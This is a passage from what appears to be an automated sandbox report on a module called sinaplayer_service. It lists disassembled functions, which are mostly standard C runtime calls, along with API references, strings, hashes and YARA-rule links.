                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: ...$`template-parameter$void
                                                                                                                                                                                                    • API String ID: 0-2152273162
                                                                                                                                                                                                    • Opcode ID: 26ac67f87ede5e34c2b4f8141074b7ff5349d9c7444e40ffb424ce7903387340
                                                                                                                                                                                                    • Instruction ID: ae9b60aad115ebc57d98f4ea0041891e20fb746c360a50f1deddb763c4808b2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26ac67f87ede5e34c2b4f8141074b7ff5349d9c7444e40ffb424ce7903387340
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C71AB70A5C2499FEB08CBA9D990BFD7BF5BB0A300F44441ED541A7285DB769806CB20
                                                                                                                                                                                                    Function 6D09BDFC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 155stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000000,e+000,?), ref: 6D09BE93
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,0000002D,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000002), ref: 6D0E0F33
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000), ref: 6D0E0F43
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000000,0000002D,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000002), ref: 6D0E0F4D
                                                                                                                                                                                                    • memmove.MSVCR120(00000002,00000003,00000003,?,00000000,00000000), ref: 6D0E0F9F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_getptd_invalid_parameter_noinfomemmovestrcpy_s
                                                                                                                                                                                                    • String ID: e+000
                                                                                                                                                                                                    • API String ID: 586226928-1027065040
                                                                                                                                                                                                    • Opcode ID: 9b9a340daef3340a3de862c1fe2fe2819bac94b8ccb56d394fddc31a14325dec
                                                                                                                                                                                                    • Instruction ID: bb1bc66de79f0cdff8e6c798172229a43ce656e3874f1d7b498eaaf192baf633
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b9a340daef3340a3de862c1fe2fe2819bac94b8ccb56d394fddc31a14325dec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6641373161C3469FF702CE2AC89076E7BA9AF56364F08D059E9548F281D735D841DB92
                                                                                                                                                                                                    Function 6D0AA7CF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • `non-type-template-parameter, xrefs: 6D0DC7BA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: `non-type-template-parameter
                                                                                                                                                                                                    • API String ID: 1333004437-4247534891
                                                                                                                                                                                                    • Opcode ID: 15b87db8f9c65c378bb6d75ca78fe13206fb02f5f996c5d4eba5295eb42f3c3d
                                                                                                                                                                                                    • Instruction ID: cc5e4dd538cc03b44bba1c9491170902886dbb7a01dadc15076a58973003f46d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15b87db8f9c65c378bb6d75ca78fe13206fb02f5f996c5d4eba5295eb42f3c3d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF41147198C2469BFB05CEA8C840FB97BB5FF4A344F69806EE5459B282DB70D843C794
                                                                                                                                                                                                    Function 6D0ACDB0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,6D0ACD86), ref: 6D0ACDCA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,6D0ACD86), ref: 6D0ACDE0
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,?,00000000,?,6D0ACD86), ref: 6D0ACE00
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000001,?,00000000,?,6D0ACD86), ref: 6D0ACE11
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000001,00000000,?,00000000,?,6D0ACD86), ref: 6D0ACE25
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,?,6D0ACD86), ref: 6D0ACE46
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crtstrlen$freestrcpy_s
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 1244768049-3401207301
                                                                                                                                                                                                    • Opcode ID: fb24db6c4f6649534f3997affcf90a1217a12211ad04a74ffcc840a94852dc01
                                                                                                                                                                                                    • Instruction ID: 795facfe130be61675734eaf28ec84087424f2652ded1daad218fc36c7bc86f1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb24db6c4f6649534f3997affcf90a1217a12211ad04a74ffcc840a94852dc01
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A62126BBD193532FFB214AB5AC40B663BD8AB07374F2A0616E560D70C2EBB598418394
                                                                                                                                                                                                    Function 6D09619F Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsrchr.MSVCR120(6D095ECA,0000002E,00000000,?,?,6D095ECA,00000400,?), ref: 6D0961FA
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.exe,00000000,?,?,6D095ECA,00000400,?), ref: 6D09620D
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.cmd,00000000,?,?,6D095ECA,00000400,?), ref: 6D09621E
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.bat,00000000,?,?,6D095ECA,00000400,?), ref: 6D09622F
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.com,00000000,?,?,6D095ECA,00000400,?), ref: 6D096240
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcsicmp$wcsrchr
                                                                                                                                                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                    • API String ID: 2496260227-4019086052
                                                                                                                                                                                                    • Opcode ID: e6abdcff207856c3f09098c51a7effc9acd820b2ae200cd32ef04360d583744c
                                                                                                                                                                                                    • Instruction ID: c1dfd504d3624252157946cd5ea2917efaf5f826a2225bb012f65b2024587562
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6abdcff207856c3f09098c51a7effc9acd820b2ae200cd32ef04360d583744c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51112737908A1364FB0403659C51B36B3F8EF827A4B95A12AE918EF0C2EF68E441B1D4
                                                                                                                                                                                                    Function 6D0A029C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0A035C
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE7D9
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE7E0
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE7ED
                                                                                                                                                                                                      • Part of subcall function 6D094206: EnterCriticalSection.KERNEL32(-0000000C,6D094260,00000008,6D0A02F5,00000000,6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30), ref: 6D09424C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000), ref: 6D0DE7F7
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000), ref: 6D0DE802
                                                                                                                                                                                                      • Part of subcall function 6D0A0189: _isatty.MSVCR120(?,00000000,00000000,00000000), ref: 6D0A0222
                                                                                                                                                                                                      • Part of subcall function 6D0A0189: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6D0A0263
                                                                                                                                                                                                      • Part of subcall function 6D0A0354: __unlock_fhandle.LIBCMT ref: 6D0A0355
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE81F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE82A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno$_errno$CriticalEnterFileSectionWrite__unlock_fhandle_invalid_parameter_noinfo_isatty
                                                                                                                                                                                                    • String ID: 0]m
                                                                                                                                                                                                    • API String ID: 2104561730-866580982
                                                                                                                                                                                                    • Opcode ID: 901471341cc2f48317df2daa9703f64b72736b3920b977e26499ef116ff1fe50
                                                                                                                                                                                                    • Instruction ID: d0f1739b692c526f2200127b2a11b83be099cf82de97a2b89018f4886f29c9b3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901471341cc2f48317df2daa9703f64b72736b3920b977e26499ef116ff1fe50
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521297281D3159FFB529FA4C88036C76B4BF02328F5B4251D6B49F2F2CBB889009B51
                                                                                                                                                                                                    Function 6D0AFA4C Relevance: 15.3, APIs: 10, Instructions: 265COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA78
                                                                                                                                                                                                    • _lseek.MSVCR120(00000000,00000000,00000001,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30), ref: 6D0AFA95
                                                                                                                                                                                                    • _lseek.MSVCR120(?,00000000,00000002), ref: 6D0B1B0C
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D5699
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D56A4
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D57D9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_lseek$_fileno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 904722208-0
                                                                                                                                                                                                    • Opcode ID: a8c04e56c4818c43d7778070e5f4f852e8217eb7e5a9e3424d1e2dfe4edd943b
                                                                                                                                                                                                    • Instruction ID: 1a2b32761a5653009c8b5082536823bfff27dbbac3026432557988d7ae9ba7c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8c04e56c4818c43d7778070e5f4f852e8217eb7e5a9e3424d1e2dfe4edd943b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51B10634A082559BEB21CF58C984BE8BBF5FB06304F5481D5E9989B282D3B1DEC1CF50
                                                                                                                                                                                                    Function 6D0A0D5C Relevance: 15.2, APIs: 10, Instructions: 208COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000003,00000000,00000004,?,?,?,6D0A0F30,00000000,00000000,00000000), ref: 6D0A0D9F
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E14
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,?,00000000,?,00000000,00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E31
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,00000400,00000000,?,?,00000000,?,?), ref: 6D0A0EAD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6D0A0ED2
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,?,?,?,?,?,?,?), ref: 6D0A0EDB
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6D0A0EE2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$String__crt_freea_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471089800-0
                                                                                                                                                                                                    • Opcode ID: 1988e71b20ce7854dcfcd0ca5185bc7186ae62affe020efe349ff11a878cedf9
                                                                                                                                                                                                    • Instruction ID: 2d9179abe348a6ab0e6e49caf867124c24196ec1a4db5416256a9d5f5e17d7a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1988e71b20ce7854dcfcd0ca5185bc7186ae62affe020efe349ff11a878cedf9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51E072A0421AAFFF11CEA9CC40FBE3AE9EF45390F194119F9059B256D771DC4097A0
                                                                                                                                                                                                    Function 6D10BA07 Relevance: 15.2, APIs: 10, Instructions: 170stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10BA27
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10BA31
                                                                                                                                                                                                    • strcat_s.MSVCR120(?,?,00000000,?), ref: 6D10BA59
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BA7E
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BAA3
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BAFE
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BB1F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D10BB29
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BB44
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BB6D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strcat_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2457174781-0
                                                                                                                                                                                                    • Opcode ID: c20dc1d872c4f7bd5e6ce91623f2600e713448f792287dd6e33e3832ab264743
                                                                                                                                                                                                    • Instruction ID: 283da4de46c6d505732d8edf90831f4ee0f8c7ec6c624b07f2e242344063e256
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c20dc1d872c4f7bd5e6ce91623f2600e713448f792287dd6e33e3832ab264743
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03512231A0C246DFCB02AF7CC990BAE7BA8EF5A754F108069E5509B289DFB1C981C750
                                                                                                                                                                                                    Function 6D092E3F Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?,?,?,00000000,?,?), ref: 6D092E94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 993cc10fa83245c74dda5deaa5b6e389ef3e230480e3ce1fa6d698151f2e88f3
                                                                                                                                                                                                    • Instruction ID: 866470e3f12c020b555d30d931736bd2642a05feada383d343ccf8371b0638bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 993cc10fa83245c74dda5deaa5b6e389ef3e230480e3ce1fa6d698151f2e88f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00418031A0425BAFFB218F78C884BBB7BF8AF06754F91515AF9649B191DB30C800D7A1
                                                                                                                                                                                                    Function 6D094321 Relevance: 15.1, APIs: 10, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?,?), ref: 6D09437E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 079afd3f20d9ec14950b0ba18bbf7f9503d9ee7fa80e94556a9cf48eb8bee2fa
